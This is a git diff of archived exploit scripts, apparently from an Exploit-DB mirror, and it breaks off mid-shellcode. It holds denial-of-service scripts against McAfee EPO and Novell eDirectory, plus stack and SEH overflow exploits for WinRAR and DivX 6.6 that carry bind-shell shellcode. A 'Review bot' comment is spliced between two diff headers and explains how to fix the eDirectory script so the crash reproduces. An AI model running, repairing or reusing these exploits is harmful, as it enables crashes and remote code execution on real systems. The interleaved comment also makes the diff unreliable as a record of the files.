-# http://www.offensive-security.com/0day/mcafee_again.py.txt
-
-
-# EAX 00840C30
-# ECX 00837830
-# EDX 01EACF18
-# EBX 00004000
-# ESP 01EAFF04
-# EBP 01EAFF38
-# ESI 00837830
-# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
-# EIP 42424242
-
-import socket
-import os
-import sys
-from time import sleep
-
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8081 ) )
-buff="B"*96000+" HTTP/1.1\r\n"
-req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
-expl.send (req)
-#data=expl.recv(1024)
-#print data
-expl.close()
-
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8081 ) )
-buff="B"*96000+" HTTP/1.1\r\n"
-req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
-expl.send (req)
-#data=expl.recv(1024)
-#print data
-expl.close()
-
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8081 ) )
-buff="B"*96000+" HTTP/1.1\r\n"
-req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
-expl.send (req)
-#data=expl.recv(1024)
-#print data
-expl.close()
-
-while 1:
-
- expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
- expl.connect ( ( sys.argv[1], 8081 ) )
- buff="B"*243
- req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- expl.send (req)
- data=expl.recv(1024)
- print data
- expl.close()
-
- sleep(0.1)
-
-# milw0rm.com [2008-04-02]
+#!/usr/bin/python
+# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
+# More than meets the eye
+# Discovered and coded by Mati Aharoni
+# muts..at..offensive-security.com
+# http://www.offensive-security.com/0day/mcafee_again.py.txt
+
+
+# EAX 00840C30
+# ECX 00837830
+# EDX 01EACF18
+# EBX 00004000
+# ESP 01EAFF04
+# EBP 01EAFF38
+# ESI 00837830
+# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
+# EIP 42424242
+
+import socket
+import os
+import sys
+from time import sleep
+
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect ( ( sys.argv[1], 8081 ) )
+buff="B"*96000+" HTTP/1.1\r\n"
+req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
+expl.send (req)
+#data=expl.recv(1024)
+#print data
+expl.close()
+
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect ( ( sys.argv[1], 8081 ) )
+buff="B"*96000+" HTTP/1.1\r\n"
+req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
+expl.send (req)
+#data=expl.recv(1024)
+#print data
+expl.close()
+
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect ( ( sys.argv[1], 8081 ) )
+buff="B"*96000+" HTTP/1.1\r\n"
+req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
+expl.send (req)
+#data=expl.recv(1024)
+#print data
+expl.close()
+
+while 1:
+
+ expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+ expl.connect ( ( sys.argv[1], 8081 ) )
+ buff="B"*243
+ req= buff +' /spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n'
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ expl.send (req)
+ data=expl.recv(1024)
+ print data
+ expl.close()
+
+ sleep(0.1)
+
+# milw0rm.com [2008-04-02]
diff --git a/platforms/windows/dos/5344.py b/platforms/windows/dos/5344.py
index d02c4df7b..06062e74b 100755
--- a/platforms/windows/dos/5344.py
+++ b/platforms/windows/dos/5344.py
@@ -1,21 +1,21 @@
-#!/usr/bin/python
-# Novel eDirectory HTTP DOS
-# Discovered and coded by Mati Aharoni
-# muts..at..offensive-security.com
-# http://www.offensive-security.com/0day/novel-edir.py.txt
-
-import socket
-import os
-import sys
-from time import sleep
-
-biff="<"*2048
-print "[*] Payload sent "+ str(len(buff))
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8028 ) )
-expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
-data=expl.recv(1024)
-print data
-expl.close()
-
-# milw0rm.com [2008-04-02]
+#!/usr/bin/python
+# Novel eDirectory HTTP DOS
+# Discovered and coded by Mati Aharoni
+# muts..at..offensive-security.com
+# http://www.offensive-security.com/0day/novel-edir.py.txt
+
+import socket
+import os
+import sys
+from time import sleep
+
+biff="<"*2048
+print "[*] Payload sent "+ str(len(buff))
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl.connect ( ( sys.argv[1], 8028 ) )
+expl.send ( 'HEAD '+biff+' HTTP/1.1\r\nHost: 192.168.1.10:20\r\nUser-Agent: Mozilla/4.0 (Linux 2.6.21.5) Java/1.5.0_02\r\n\r\n')
+data=expl.recv(1024)
+print data
+expl.close()
+
+# milw0rm.com [2008-04-02]
diff --git a/platforms/windows/dos/599.py b/platforms/windows/dos/599.py
index b315e2909..0a2502abb 100755
--- a/platforms/windows/dos/599.py
+++ b/platforms/windows/dos/599.py
@@ -28,6 +28,6 @@ try:
 s.close()
 print "\nRun this script again, and server should crash."
 except:
- print "\nCould not connect to sever!"
-
-# milw0rm.com [2004-10-26]
+ print "\nCould not connect to sever!"
+
+# milw0rm.com [2004-10-26]
diff --git a/platforms/windows/local/1985.py b/platforms/windows/local/1985.py
index b087fe5f3..d3a7541ce 100755
--- a/platforms/windows/local/1985.py
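Review bot: `print "[*] Payload sent "+ str(len(buff))` in the new side of 5344.py references `buff`, which is never assigned anywhere in the file — the payload two lines above is bound to `biff` — so the script raises NameError before it reaches `expl.connect` and the stored PoC cannot reproduce the reported crash as written. The one-line fix is `print "[*] Payload sent "+ str(len(biff))` (or rename `biff` to `buff` on both lines). Separately, `expl.recv(1024)` runs with no socket timeout, so against a target that stalls instead of resetting the connection the script blocks indefinitely; `expl.settimeout(10)` right after the socket is created would make the outcome observable. The removed and added lines appear textually identical, so this looks like a line-ending normalization that carries the defect forward unchanged.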
+++ b/platforms/windows/local/1985.py 
@@ -1,86 +1,86 @@
-"""
-WinRAR - Stack Overflows in SelF - eXtracting Archives
-======================================================
-
-Tested Version(s)..: WinRAR 3.60 beta 4
-Original Author.............: posidron
-Shellcode Stuffing .........: muts
-
-"""
-
-import os, sys
-
-winrar__ = 'C:\WinRAR.exe'
-sfxnfo__ = "comment.txt"
-result__ = "sample.exe"
-
-# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
-
-sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
-sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
-sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
-sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
-sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
-sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
-sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
-sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
-sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
-sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
-sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
-sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
-sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
-sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
-sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
-sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
-sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
-sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
-sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
-sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
-sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
-sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
-sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
-sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
-sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
-sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
-sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
-sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
-sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
-sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
-sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
-sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
-sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
-sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
-sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
-sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
-sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
-sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
-sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
-sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
-sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
-sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
-sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
-sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
-sc +="\x4f\x4f\x42\x4d\x5a"
-
-buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
-
-try:
- info = open(sfxnfo__, "w+b")
- info.write(buf)
- info.close()
-except IOError:
- sys.exit("Error: unable to create: " + sfxnfo__)
-
-print "Creating archive:",
-os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
-os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
-print "done."
-print "Executing:",
-# debug only!
-#os.spawnv(os.P_WAIT, result__, [result__, ""])
-#print "done."
-print "Cleaning up:",
-os.remove(sfxnfo__)
-print "done."
-
-# milw0rm.com [2006-07-05]
+"""
+WinRAR - Stack Overflows in SelF - eXtracting Archives
+======================================================
+
+Tested Version(s)..: WinRAR 3.60 beta 4
+Original Author.............: posidron
+Shellcode Stuffing .........: muts
+
+"""
+
+import os, sys
+
+winrar__ = 'C:\WinRAR.exe'
+sfxnfo__ = "comment.txt"
+result__ = "sample.exe"
+
+# win32_bind - EXITFUNC=seh LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com */
+
+sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
+sc +="\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
+sc +="\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
+sc +="\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
+sc +="\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x36\x4b\x4e"
+sc +="\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x56\x4b\x58"
+sc +="\x4e\x36\x46\x32\x46\x42\x4b\x58\x45\x44\x4e\x43\x4b\x58\x4e\x37"
+sc +="\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x48"
+sc +="\x4f\x35\x42\x52\x41\x50\x4b\x4e\x49\x44\x4b\x48\x46\x53\x4b\x58"
+sc +="\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
+sc +="\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
+sc +="\x46\x4f\x4b\x43\x46\x55\x46\x52\x4a\x52\x45\x47\x45\x4e\x4b\x48"
+sc +="\x4f\x35\x46\x32\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x54"
+sc +="\x4b\x48\x4f\x55\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x42\x4b\x48"
+sc +="\x49\x48\x4e\x56\x46\x42\x4e\x41\x41\x46\x43\x4c\x41\x33\x4b\x4d"
+sc +="\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x48\x42\x54\x4e\x50\x4b\x48"
+sc +="\x42\x37\x4e\x31\x4d\x4a\x4b\x48\x42\x44\x4a\x30\x50\x35\x4a\x36"
+sc +="\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56"
+sc +="\x43\x55\x48\x46\x4a\x46\x43\x33\x44\x53\x4a\x56\x47\x57\x43\x57"
+sc +="\x44\x43\x4f\x45\x46\x45\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"
+sc +="\x4e\x4f\x4b\x33\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e"
+sc +="\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x56\x44\x50"
+sc +="\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45"
+sc +="\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x55\x43\x45\x43\x34"
+sc +="\x43\x45\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x51"
+sc +="\x4e\x35\x48\x56\x43\x45\x49\x38\x41\x4e\x45\x59\x4a\x56\x46\x4a"
+sc +="\x4c\x51\x42\x57\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x51"
+sc +="\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32"
+sc +="\x49\x4e\x47\x55\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d"
+sc +="\x4a\x36\x45\x4e\x49\x44\x48\x38\x49\x34\x47\x55\x4f\x4f\x48\x4d"
+sc +="\x42\x55\x46\x55\x46\x45\x45\x55\x4f\x4f\x42\x4d\x43\x39\x4a\x46"
+sc +="\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45"
+sc +="\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x56\x48\x56\x4a\x36\x43\x36"
+sc +="\x4d\x36\x49\x38\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x32\x4e\x4c"
+sc +="\x49\x58\x47\x4e\x4c\x46\x46\x34\x49\x58\x44\x4e\x41\x33\x42\x4c"
+sc +="\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x32"
+sc +="\x43\x59\x4d\x48\x4c\x37\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"
+sc +="\x44\x47\x50\x4f\x43\x4b\x48\x31\x4f\x4f\x45\x57\x46\x44\x4f\x4f"
+sc +="\x48\x4d\x4b\x55\x47\x45\x44\x55\x41\x55\x41\x45\x41\x45\x4c\x56"
+sc +="\x41\x30\x41\x35\x41\x55\x45\x45\x41\x55\x4f\x4f\x42\x4d\x4a\x56"
+sc +="\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46"
+sc +="\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x47\x35\x4e\x4f"
+sc +="\x43\x58\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
+sc +="\x4a\x46\x42\x4f\x4c\x38\x46\x30\x4f\x45\x43\x55\x4f\x4f\x48\x4d"
+sc +="\x4f\x4f\x42\x4d\x5a"
+
+buf = "Path=" + "\x90" * (2035-len(sc)) +sc+ "\x3c\x15\xdc\x77" + "\x90" * 8 + "\xEB\x30\x90\x90" + "\r\nSavePath\r\n" # JMP ESP XP SP2
+
+try:
+ info = open(sfxnfo__, "w+b")
+ info.write(buf)
+ info.close()
+except IOError:
+ sys.exit("Error: unable to create: " + sfxnfo__)
+
+print "Creating archive:",
+os.spawnv(os.P_WAIT, winrar__, [winrar__, "a -sfx -s " + result__ + " " + __file__])
+os.spawnv(os.P_WAIT, winrar__, [winrar__, "c -z" + sfxnfo__ + " " + result__])
+print "done."
+print "Executing:",
+# debug only!
+#os.spawnv(os.P_WAIT, result__, [result__, ""])
+#print "done."
+print "Cleaning up:",
+os.remove(sfxnfo__)
+print "done."
+
+# milw0rm.com [2006-07-05]
diff --git a/platforms/windows/local/5462.py b/platforms/windows/local/5462.py
index 2b5f163cb..bb080e5dc 100755
--- a/platforms/windows/local/5462.py
+++ b/platforms/windows/local/5462.py
@@ -1,165 +1,165 @@
-#!/usr/bin/python
-#######################################################################
-# DivX 6.6 SRT SEH overwrite PoC
-# Tested on XP SP2
-# Coded by Mati Aharoni, aka muts and Chris Hadnagy, aka loganWHD
-# muts..at..offensive-security...dot..com
-# chris..at..offensive-security...dot..com
-# http://www.offensive-security.com/0day/divx66.py.txt
-# Notes: Unicode buffer - real pita.
-# Greetz to our wives - thanks for the couch!
-#######################################################################
-# Microsoft Windows XP [Version 5.1.2600]
-# (C) Copyright 1985-2001 Microsoft Corp.
-#
-# C:\Documents and Settings\Administrator\Desktop>
-#######################################################################
-# file = name of avi video file
-file="infidel.srt"
-
-# Unicode friendly POP POP RET somewhere in DivX 6.6
-# Note: \x94 bites back - dealt with by xchg'ing again and doing a dance to shellcode Gods
-
-ret="\x94\x48"
-
-# Align stack for register save
-nudge="\x48\x6d"
-
-# Payload building blocks
-
-buffer="\x41" * 1032
-
-xchg="\x94\x6d" # Swap back EAX, ESP for stack save,nop
-
-pushad="\x60\x6d" # Save stack registers,nop
-
-pushfd="\x9c\x6d"
-
-align_buffer="\x05\xFF\x3C\x6D\x2D\xe1\x3C\x6D\x2D\xFF\x10\x6D\x05\xFF\x10\x6D" # Point to end of buffer
-
-align_eax="\x2D\x2F\x10\x6D\x05\x10\x10\x6D" # Align EAX for popad/fd
-
-popfd="\x9D\x6D" # popfd,nop
-
-popad="\x61\x6D"# popad,nop
-
-padding="\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70\x70" # Crawl with remaining strength on bleeding knees to shellcode
-
-rest= "\x01" * 5000000 # Buffer and shellcode canvas
-
-# PoC Venetian Bindshell on port 4444 - ph33r
-# Built on alternating 00 01 surface
-# Venetian self decoding bindshell - 1580 bytes
-
-bindshell = (buffer + ret + xchg + pushad + pushfd + xchg + align_buffer +
-"\x80\xFB\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80"
-"\x4D\x6D\x40\x6D\x80\xE7\x6D\x40\x6D\x80\xF9\x6D\x40\x6D\x80\xFE"
-"\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\x60\x6D" -"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x6C\x6D\x40\x6D\x80\x23\x6D\x40" -"\x6D\x80\x24\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x45\x6D\x40\x6D" -"\x80\x3B\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x7B\x6D\x40\x6D\x80" -"\x05\x6D\x40\x6D\x80\x77\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xEE" -"\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x4E\x6D\x40\x6D\x80\x18\x6D" -"\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x5F\x6D\x40\x6D\x80\x1F\x6D\x40" -"\x6D\x80\x01\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\x49\x6D\x40\x6D" -"\x80\x8A\x6D\x40\x6D\x80\x34\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" -"\x01\x6D\x40\x6D\x80\xED\x6D\x40\x6D\x80\x31\x6D\x40\x6D\x80\xBF" -"\x6D\x40\x6D\x80\x99\x6D\x40\x6D\x80\xAB\x6D\x40\x6D\x80\x84\x6D" -"\x40\x6D\x80\xBF\x6D\x40\x6D" -"\x80\x74\x6D\x40\x6D\x80\x06\x6D\x40\x6D\x80\xC1\x6D\x40\x6D\x80" -"\xC9\x6D\x40\x6D\x80\xEF\x6D\x80\x1E\x6D\x40\x6D\x40\x6D\x80\xC2" -"\x6D\x40\x6D\x80\xEA\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\x3A\x6D" -"\x40\x6D\x80\x54\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x28\x6D\x40" -"\x6D\x80\x74\x6D\x40\x6D\x80\xE5\x6D\x40\x6D\x80\x8A\x6D\x40\x6D" -"\x80\x5F\x6D\x40\x6D\x80\x23\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80" -"\xEA\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x0C" -"\x6D\x40\x6D\x80\x4A\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x5E\x6D" -"\x40\x6D\x80\x1C\x6D\x40\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x02" -"\x6D\x40\x6D\x80\x2C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x89\x6D" -"\x40\x6D\x80\x6B\x6D\x40\x6D\x80\x24\x6D\x40\x6D\x80\x1B\x6D\x40" -"\x6D\x80\x61\x6D\x40\x6D\x80\xC2\x6D\x40\x6D\x80\x31\x6D\x40\x6D" -"\x80\xDA\x6D\x40\x6D\x80\x64\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80" -"\x43\x6D\x40\x6D\x80\x2F\x6D\x40\x6D\x80\x8B\x6D\x40\x6D\x80\x3F" -"\x6D\x40\x6D\x80\x0C\x6D\x40\x6D\x80\x8A\x6D\x40\x6D\x80\x70\x6D" -"\x40\x6D\x80\x1B\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x8A\x6D\x40" -"\x6D\x80\x40\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x5E\x6D\x40\x6D" 
-"\x80\x67\x6D\x40\x6D\x80\x8E\x6D\x40\x6D\x80\x4D\x6D\x40\x6D\x80" -"\x0E\x6D\x40\x6D\x80\xEB\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE" -"\x6D\x40\x6D\x80\xD6\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x53\x6D" -"\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\x32\x6D\x40" -"\x6D\x80\x32\x6D\x40\x6D\x80\x67\x6D\x40\x6D\x80\x77\x6D\x40\x6D" -"\x80\x72\x6D\x40\x6D\x80\x32\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80" -"\x54\x6D\x40\x6D\x80\xFE\x6D\x40\x6D\x80\xD0\x6D\x40\x6D\x80\x67" -"\x6D\x40\x6D\x80\xCB\x6D\x40\x6D\x80\xEC\x6D\x40\x6D\x80\xFC\x6D" -"\x40\x6D\x80\x3A\x6D\x40\x6D\x80\x50\x6D\x40\x6D\x80\xFE\x6D\x40" -"\x6D\x80\xD6\x6D\x40\x6D\x80\x5E\x6D\x40\x6D\x80\x89\x6D\x40\x6D" -"\x80\xE4\x6D\x40\x6D\x80\x66\x6D\x40\x6D\x80\x80\x6D\x40\x6D\x80" -"\xED\x6D\x40\x6D\x80\x07\x6D\x40\x6D\x80\x02\x6D\x40\x6D\x80\x54" -"\x6D\x40\x6D\x80\x6A\x6D\x40\x6D\x80\x01\x6D\x40\x6D\x80\xFF\x6D" -"\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xD8\x6D\x40" -"\x6D\x80\x09\x6D\x40\x6D\x80\xF4\x6D\x40\x6D\x80\xAD\x6D\x40\x6D" -"\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80" -"\x53\x6D\x40\x6D\x80\x52\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x52" -"\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D" -"\x40\x6D\x80\x42\x6D\x40\x6D\x80\x53\x6D\x40\x6D\x80\xFE\x6D\x40" -"\x6D\x80\xD0\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80\x68\x6D\x40\x6D" -"\x80\x10\x6D\x40\x6D\x80\x5C\x6D\x40\x6D\x80\x65\x6D\x40\x6D\x80" -"\x53\x6D\x40\x6D\x80\x88\x6D\x40\x6D\x80\xE1\x6D\x40\x6D\x80\x94" -"\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3\x6D\x40\x6D\x80\x1A\x6D" -"\x40\x6D\x80\x6F\x6D\x40\x6D\x80\xC7\x6D\x40\x6D\x80\x56\x6D\x40" -"\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40\x6D\x80\x6A\x6D\x40\x6D" -"\x80\x0F\x6D\x40\x6D\x80\x51\x6D\x40\x6D\x80\x54\x6D\x40\x6D\x80" -"\xFF\x6D\x40\x6D\x80\xCF\x6D\x40\x6D\x80\x68\x6D\x40\x6D\x80\xA3" -"\x6D\x40\x6D\x80\xAD\x6D\x40\x6D\x80\x2D\x6D\x40\x6D\x80\xE9\x6D" -"\x40\x6D\x80\x56\x6D\x40\x6D\x80\xFF\x6D\x40\x6D\x80\xD5\x6D\x40" 
